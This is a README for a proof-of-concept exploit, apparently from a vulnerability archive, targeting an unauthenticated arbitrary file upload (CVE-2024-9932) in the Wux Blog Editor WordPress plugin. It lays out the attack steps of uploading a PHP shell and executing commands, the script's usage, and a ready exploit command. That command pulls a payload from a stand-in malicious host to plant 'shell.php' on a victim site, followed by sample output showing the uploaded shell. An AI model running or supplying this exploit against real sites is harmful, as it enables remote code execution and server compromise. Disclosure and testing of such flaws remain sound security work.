来源

关联漏洞

介绍

# CVE-2024-9932-POC


# Description:
The Wux Blog Editor WordPress plugin is vulnerable to arbitrary file uploads due to insufficient file type validation in the wuxbt_insertImageNew function. Versions up to and including 3.0.0 are affected. This vulnerability allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE).

## Vulnerability Details

The vulnerability stems from improper file type validation in the wuxbt_insertImageNew function. This allows attackers to upload malicious files to the server without authentication.

Attack Scenario:

    Attacker identifies a website using the vulnerable plugin.
    Exploits the file upload functionality to upload a malicious PHP shell.
    Executes commands on the compromised server.
    

###   Usage
```
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

```
# Exploit command
```
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
```
### Results
Successful Upload Example

1- File Found:

2- Execution Result: Navigate to the file's URL to execute the payload.
```
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

```


### Disclaimer
This tool is for educational purposes only. Unauthorized use of this script on systems without permission is illegal.

文件快照

 [4.0K]  /data/pocs/ef38f52d2cf94e8baad793befffe73dfe3159b07
├── [5.4K]  CVE-2024-9932.py
└── [1.7K]  README.md

0 directories, 2 files

备注